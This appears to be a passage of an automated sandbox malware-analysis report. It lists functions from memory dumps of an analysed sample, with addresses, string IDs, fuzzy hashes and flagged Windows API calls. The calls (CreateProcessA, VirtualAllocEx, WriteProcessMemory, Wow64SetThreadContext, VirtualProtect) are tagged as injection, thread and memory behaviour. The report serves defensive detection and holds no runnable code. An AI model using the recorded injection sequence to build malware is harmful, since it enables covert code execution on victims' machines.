                                          control_flow_graph 2874 6b52771-6b527a8 2876 6b52894-6b528b9 2874->2876 2877 6b527ae-6b527b2 2874->2877 2884 6b528c0-6b528e4 2876->2884 2878 6b527b4-6b527c0 2877->2878 2879 6b527c6-6b527ca 2877->2879 2878->2879 2878->2884 2881 6b527d0-6b527e7 2879->2881 2882 6b528eb-6b52910 2879->2882 2892 6b527e9-6b527f5 2881->2892 2893 6b527fb-6b527ff 2881->2893 2900 6b52917-6b5296a 2882->2900 2884->2882 2892->2893 2892->2900 2895 6b52801-6b5281a 2893->2895 2896 6b5282b-6b52844 2893->2896 2895->2896 2906 6b5281c-6b5281f 2895->2906 2907 6b52846-6b5286a 2896->2907 2908 6b5286d-6b52891 2896->2908 2917 6b529a2-6b529c7 2900->2917 2918 6b5296c-6b5298c 2900->2918 2910 6b52828 2906->2910 2910->2896 2925 6b529ce-6b52a0f 2917->2925 2918->2925 2926 6b5298e-6b5299f 2918->2926
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq$(aq
                                          • API String ID: 0-3916115647
                                          • Opcode ID: 1ec8120756c7ddfe82b1c99873b318621ba8411aae73c46f14a7c61013ad6275
                                          • Instruction ID: 63b9c2124cc42d577e8e9ac30766c9446b23351f5093db81dd7ab0ab6d4499f8
                                          • Opcode Fuzzy Hash: 1ec8120756c7ddfe82b1c99873b318621ba8411aae73c46f14a7c61013ad6275
                                          • Instruction Fuzzy Hash: BB51A0317002458FCB55AF69E850AEE3BA6FF84350F1580A9E9058F396CF35DD46CBA1
                                          Function 06B501D8 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq$Haq
                                          • API String ID: 0-3785302501
                                          • Opcode ID: 9e5f2ad44176ece9df6c3ddb5fbd97254cdafb8d8330a8feff2ae8d381c57325
                                          • Instruction ID: 1f81f845fec924c85c181a4d57aaaf01c14e8521d844e247aacd1d34663823ea
                                          • Opcode Fuzzy Hash: 9e5f2ad44176ece9df6c3ddb5fbd97254cdafb8d8330a8feff2ae8d381c57325
                                          • Instruction Fuzzy Hash: 43517C75B006148FC799AF28D454A6E7BA3FFC9300B1144ACEA069B3A5DF31ED06DB91
                                          Function 06B55522 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$W
                                          • API String ID: 0-897312741
                                          • Opcode ID: a38890bc3a9952baa3ca90791471c46bc76cd00c84ef3f580f668dd8aec81b79
                                          • Instruction ID: cf22d9aa232ee11aa6fed54a67533e715d8ebf56af104ef89dda036b24eec616
                                          • Opcode Fuzzy Hash: a38890bc3a9952baa3ca90791471c46bc76cd00c84ef3f580f668dd8aec81b79
                                          • Instruction Fuzzy Hash: E831A2767002009FCF49AFA4D954E997BB3FF88310F0540A9EA0AAB375DA72DC12DB51
                                          Function 06A2C688 Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: c$n
                                          • API String ID: 0-3996254610
                                          • Opcode ID: ffc50a2ed760a3936829dd1e30f9b5753b3d80499ede1c8395cb69bf862dc823
                                          • Instruction ID: ffb5230a5f00b423d6410bfde30d19f39d02e370e35554a72bb0b0c9e7638f2b
                                          • Opcode Fuzzy Hash: ffc50a2ed760a3936829dd1e30f9b5753b3d80499ede1c8395cb69bf862dc823
                                          • Instruction Fuzzy Hash: 65F0F974D9527BCFDBA0EF58C984BADB7B1BF09318F0004E9D509A2282C3745A80CF81
                                          Function 06B573A0 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,aq
                                          • API String ID: 0-3092978723
                                          • Opcode ID: 055d12d0542c5ad23ceec310c480f4cf8274ff8d5f82ad9739ebcb07c287cd1d
                                          • Instruction ID: ff880060e3d31b431616e5e541947a7411fca1c476adf78cd1562a637db21717
                                          • Opcode Fuzzy Hash: 055d12d0542c5ad23ceec310c480f4cf8274ff8d5f82ad9739ebcb07c287cd1d
                                          • Instruction Fuzzy Hash: 1F52F9B5A002288FDB64DF69C945BDDBBF6FB88300F1541E9E909A7351DA309E81CF61
                                          Function 06B51780 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (_]q
                                          • API String ID: 0-188044275
                                          • Opcode ID: 982cb09b3a5bac541e582732a06f0ef329a0a3a4881537f480b7c90ac07ddf89
                                          • Instruction ID: db8eac6b3a7d106427c6bcfdf584e439e18e1b068b0351902226b95eb96d8499
                                          • Opcode Fuzzy Hash: 982cb09b3a5bac541e582732a06f0ef329a0a3a4881537f480b7c90ac07ddf89
                                          • Instruction Fuzzy Hash: 2B2249B5A00604DFDB54DFA8D490BA9B7F2FF88300F1684A9E915AB391DB71ED41CB90
                                          Function 06CE8185 Relevance: 1.7, APIs: 1, Instructions: 208processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06CE836A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 80da4d8058576b4ffd889c3bdbd242d41a9d0e457fdae7d503bc3c7de1163b0c
                                          • Instruction ID: 4ec2b3e8d5ff7d2fb22b1943994d3d3524a4b82b2b193af4c64621fbd15f9d83
                                          • Opcode Fuzzy Hash: 80da4d8058576b4ffd889c3bdbd242d41a9d0e457fdae7d503bc3c7de1163b0c
                                          • Instruction Fuzzy Hash: 818145B1D016099FDB54CFA9C8857EEBBF1FF48310F148529E858EB280DB789981CB91
                                          Function 00DAAA28 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00DAAC7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3036028785.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: f9d00bdcf517d619e23b9d5ef19105f24a1931c96f20b96162ac5c9f89f9adde
                                          • Instruction ID: 99c77e252cb85440c995552f2552f2658517c2ee78aa97a151539a9e785cf200
                                          • Opcode Fuzzy Hash: f9d00bdcf517d619e23b9d5ef19105f24a1931c96f20b96162ac5c9f89f9adde
                                          • Instruction Fuzzy Hash: 7E814570A00B058FDB24DF69D55179ABBF6FF89300F048A2DD48AD7A50DB34E949CBA1
                                          Function 06CE8190 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06CE836A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 30c46a78b36e449d14f1109acf8834f52c2558d83217e6896f8e32ec5a4cc200
                                          • Instruction ID: 25ce155325d894dbf55df013bfdfe6a82395decf528ec7f3a8f11144db55cc6a
                                          • Opcode Fuzzy Hash: 30c46a78b36e449d14f1109acf8834f52c2558d83217e6896f8e32ec5a4cc200
                                          • Instruction Fuzzy Hash: 60813571D016098FDB50CFA9C8857EEBBF2FF48310F14852AE858E7280DB789981CB91
                                          Function 06B5822D Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $]q
                                          • API String ID: 0-1007455737
                                          • Opcode ID: 87a85373f16b793dccaed12622403117afa64036d23e98a44cced334da73e0d6
                                          • Instruction ID: c813fa8790fe1afff3d92fe962504dd3977173d1fcbe1ee842a39359601ed38a
                                          • Opcode Fuzzy Hash: 87a85373f16b793dccaed12622403117afa64036d23e98a44cced334da73e0d6
                                          • Instruction Fuzzy Hash: 94E1B5B6B042618FE7A59F28D4517AE7BE2FFC5300F1540A9E982CB395DA34CD41CB52
                                          Function 06CE9610 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06CE96A8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: d3d7c373e9f41ef9c1963571ae3923e674cbc8b708c7cbdbb9dc4d0ea3ebb01a
                                          • Instruction ID: a5be5eb47c308bddb54a1b14c2dd2279a9513b40e71baea7bac892bd3ee68cd4
                                          • Opcode Fuzzy Hash: d3d7c373e9f41ef9c1963571ae3923e674cbc8b708c7cbdbb9dc4d0ea3ebb01a
                                          • Instruction Fuzzy Hash: BA2144B5D00209DFCB50CFA9C884BEEBBF5FF88310F10842AE919A7250D7799941CBA0
                                          Function 06CE9618 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06CE96A8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 3180c5524bd33c29db861186c85438550eb0903f32382d7c9059c8b65b949d34
                                          • Instruction ID: b44516f47a2e10738c94df2d6e08810ba812c76542b51657f01dcb9762eae693
                                          • Opcode Fuzzy Hash: 3180c5524bd33c29db861186c85438550eb0903f32382d7c9059c8b65b949d34
                                          • Instruction Fuzzy Hash: 1D2136B5D003099FCB50DFAAC885BEEBBF5FF48310F10842AE919A7240D7789944CBA1
                                          Function 06CE8D58 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CE8DDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 6e305cb727e4b8723ac246b420d93a021ce2209381592f97096a26be23ba9ab6
                                          • Instruction ID: a1cd064dadaa9cb7a5d838e53154a09e50862f6651812c99cbd9212d3791806a
                                          • Opcode Fuzzy Hash: 6e305cb727e4b8723ac246b420d93a021ce2209381592f97096a26be23ba9ab6
                                          • Instruction Fuzzy Hash: AF2168B5D003098FDB50DFAAC8857EEBBF4EF58310F10842AD459A7240CB789A45CFA1
                                          Function 06CE8D60 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CE8DDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: a2c03a985786d9f3ac86f5d463b1f728bf316649efc354f751e21adf3e8e9861
                                          • Instruction ID: 8490808a4d54cbeed7fc6d2b38309cb225cadc36af0de0e67c9ec898d5f3a299
                                          • Opcode Fuzzy Hash: a2c03a985786d9f3ac86f5d463b1f728bf316649efc354f751e21adf3e8e9861
                                          • Instruction Fuzzy Hash: 5A2115B5D002098FDB50DFAAC8857EEBBF5EF48314F14842AD519A7240CB78AA45CFA5
                                          Function 06CD7330 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06CD73AC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 8f387196c181d1dcf0aca3f65c188c88e3e61a8d809ea177abafadc3fdc67aaf
                                          • Instruction ID: a78555ab00c928fbbad028375aabc41c5c79e10b5ce869e1b079371f96552821
                                          • Opcode Fuzzy Hash: 8f387196c181d1dcf0aca3f65c188c88e3e61a8d809ea177abafadc3fdc67aaf
                                          • Instruction Fuzzy Hash: 712107B19002499FDB10DFAAC845BEEFBF5EF88310F54842DD559A7240CB789545CFA1
                                          Function 00DAD300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DAD387
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3036028785.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: e1bda8820dcba3cfec5e7185a3c2ddea59167f2d871e0a1d603564ed6d050675
                                          • Instruction ID: d4105695243b50acbe2b9a94787466212fc0b4d4ec7922e4495489038826095c
                                          • Opcode Fuzzy Hash: e1bda8820dcba3cfec5e7185a3c2ddea59167f2d871e0a1d603564ed6d050675
                                          • Instruction Fuzzy Hash: 0521C2B59002489FDB10CFAAD984ADEBFF9FB48310F14841AE919A3350D378A954CFA5
                                          Function 06CD7338 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06CD73AC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: b7014eae53d88887682a6c7f7ef27efc8d0722f45e99c17132bf09416ffea96a
                                          • Instruction ID: f2a5e5e1645e23297f62598f8d5de9d9fcde2f663b3f47d53d36b8fb3068fc6f
                                          • Opcode Fuzzy Hash: b7014eae53d88887682a6c7f7ef27efc8d0722f45e99c17132bf09416ffea96a
                                          • Instruction Fuzzy Hash: E421E5B1D002099FDB10DFAAC845AEEFBF5EF48320F548429D519A7240CB789945CFA1
                                          Function 06CE9369 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CE93DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 15896559c2d8b8603906cf83c7252638032c9b00fa7b66835b1d021c4dbe0401
                                          • Instruction ID: b116e10fc55c7a64faf6a401bf01571a7ac289a6248e064020181e6a781193ce
                                          • Opcode Fuzzy Hash: 15896559c2d8b8603906cf83c7252638032c9b00fa7b66835b1d021c4dbe0401
                                          • Instruction Fuzzy Hash: FF113AB58002499FCB20DFAAC845ADFFFF5EF48320F108419E519A7250CB799541CFA1
                                          Function 0695E048 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 0695E0BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052480576.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6950000_file.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 49a99cf35027b818153e79e8f3e8a1db2f32bb294fadc19470e14fd50e7a4a50
                                          • Instruction ID: e7fe1be73b9294adf773a9bcd4564d7e03888f3583447548a1e0c0643d289907
                                          • Opcode Fuzzy Hash: 49a99cf35027b818153e79e8f3e8a1db2f32bb294fadc19470e14fd50e7a4a50
                                          • Instruction Fuzzy Hash: 9E11D6B5D002499FDB10DFAAC844AEEFBF9FF48310F14842AD519A7250CB79A945CFA1
                                          Function 00DA9529 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00DA959D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3036028785.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: c30169f56b657568fbfe9846ca5ed863f6bde12f8b63cb54ce8004a2ad010d33
                                          • Instruction ID: be7e6f87f5385f4e9f4e97e7ded313191ddda4b2942a40dffd3cdfdfb63ce622
                                          • Opcode Fuzzy Hash: c30169f56b657568fbfe9846ca5ed863f6bde12f8b63cb54ce8004a2ad010d33
                                          • Instruction Fuzzy Hash: BB21C0B48043C4CEDB11DF59D4153EEBFF4EB06300F548499C599B3682C3399648CBA1
                                          Function 06CE9370 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CE93DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: fba70ed67af148d5b2ea3cc5de26b8543d17d5d2d2da4b97a6ca31e75a703305
                                          • Instruction ID: 0e7088f16565dc9e9fb3a3898bdd8d217df9c4818607c8d3f13bd3f2b110ccf1
                                          • Opcode Fuzzy Hash: fba70ed67af148d5b2ea3cc5de26b8543d17d5d2d2da4b97a6ca31e75a703305
                                          • Instruction Fuzzy Hash: 2F1137B58002499FCB10DFAAC845AEEBFF5EF48310F108419E519A7250CB79A540CFA1
                                          Function 00DAAC18 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00DAAC7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3036028785.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 65e328b7ebae85a6a04f96437721aa2d77fecf4c68f4696f93313dba2d0db675
                                          • Instruction ID: 4f6dac7cfb58c6dd29169aa8a2a2a3bc8aec121742e0b85599a89332195cf886
                                          • Opcode Fuzzy Hash: 65e328b7ebae85a6a04f96437721aa2d77fecf4c68f4696f93313dba2d0db675
                                          • Instruction Fuzzy Hash: 7511DFB5C002498FDB10DF9AC944ADEFBF4EB89324F14851AD819B7210C379A545CFA1
                                          Function 06B564B8 Relevance: 1.5, Strings: 1, Instructions: 249COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q
                                          • API String ID: 0-1259897404
                                          • Opcode ID: cd0dc18339a3a083fcc20d9c13a0b1ce5110819a92d9ec1c8ac92d8d6f35465f
                                          • Instruction ID: 9e02cb6b2ea41ee12bbd98557e5e90b732bc1ba49bff99d012f76184bc799634
                                          • Opcode Fuzzy Hash: cd0dc18339a3a083fcc20d9c13a0b1ce5110819a92d9ec1c8ac92d8d6f35465f
                                          • Instruction Fuzzy Hash: F3B1E874A10218DFCB44EFA4D894A9DBBB2FF89300F568199E905AB375DB71EC42CB50
                                          Function 06A278C1 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TJbq
                                          • API String ID: 0-1760495472
                                          • Opcode ID: cfea620d4f6532c1c70d3ae98210d18452ab020f621df796541ab03ecc29bfd4
                                          • Instruction ID: 3bd8d17deec0f7c8325a513ac6f6d3cfad8a194e1749527e24679750763d8aa2
                                          • Opcode Fuzzy Hash: cfea620d4f6532c1c70d3ae98210d18452ab020f621df796541ab03ecc29bfd4
                                          • Instruction Fuzzy Hash: 9C712FB4E44219DFCB44EFA8D444AAEBBF2FF89300F208029E515A7358DB349A49CF51
                                          Function 06A278D0 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TJbq
                                          • API String ID: 0-1760495472
                                          • Opcode ID: 1bd842f61ad6a111c38537dcd612e60d5a9a4daa3db053810c49a4a0a867a3b7
                                          • Instruction ID: c1b268dfd0a9c1e1f623136cf68599981e3cc37cb0a4f1e77d7dd3169733ab6c
                                          • Opcode Fuzzy Hash: 1bd842f61ad6a111c38537dcd612e60d5a9a4daa3db053810c49a4a0a867a3b7
                                          • Instruction Fuzzy Hash: 43712DB4E44219DFDB44EFA8D484AAEBBF2FF89300F208029D515A7758DB349A49CF51
                                          Function 069CD290 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq
                                          • API String ID: 0-600464949
                                          • Opcode ID: eec1969ea35c64674c76dd64e6e138a6c79b83918edf432567b046169610d377
                                          • Instruction ID: 1df5c75d1aa197622b672bfd166220961d54247f20983c4b7095df295266d9bb
                                          • Opcode Fuzzy Hash: eec1969ea35c64674c76dd64e6e138a6c79b83918edf432567b046169610d377
                                          • Instruction Fuzzy Hash: EC51D135B005168FCB00DF68D884AAAFBB5FF89320F1586A9E5259B781D730F856CBD1
                                          Function 069CC2D8 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: paq
                                          • API String ID: 0-3273118895
                                          • Opcode ID: 8cb8fcb51e730e8e6056738fe3ae2d4cf537fa631d29f197f4cd51d381942625
                                          • Instruction ID: 9715da01bd9eb6e7a974e7057186762c4067e4928b2c3fe7bfb9da790f2c07f3
                                          • Opcode Fuzzy Hash: 8cb8fcb51e730e8e6056738fe3ae2d4cf537fa631d29f197f4cd51d381942625
                                          • Instruction Fuzzy Hash: C0516C76640104AFCB459FA8D904D69BFF7FF8C31071A8498E2099B376DA36DC22EB51
                                          Function 06B5A159 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q
                                          • API String ID: 0-1259897404
                                          • Opcode ID: f0d55d82d543e6308f5dca41902f30a82eb3fb9cd0d1adaaf3b6679b7d88bb2e
                                          • Instruction ID: e16b9b2b66a361f3c967fe04eb9b41fd4f6f0f14c95c87323bd38664de4f1046
                                          • Opcode Fuzzy Hash: f0d55d82d543e6308f5dca41902f30a82eb3fb9cd0d1adaaf3b6679b7d88bb2e
                                          • Instruction Fuzzy Hash: A141A1B0B106148FCB94AB74C894BADB7B7AFC9700F5141ADD812AB3A4DF749C46CB91
                                          Function 06B5B1B8 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq
                                          • API String ID: 0-600464949
                                          • Opcode ID: 18774568b28d169f1c2d5d768b33323e0737a1599a4e71ebb115de39b7ccf5f5
                                          • Instruction ID: 88b43e4042c1c19fc1212090e3703b09c82a4ddf41fb2e3ebea2e28357262cd3
                                          • Opcode Fuzzy Hash: 18774568b28d169f1c2d5d768b33323e0737a1599a4e71ebb115de39b7ccf5f5
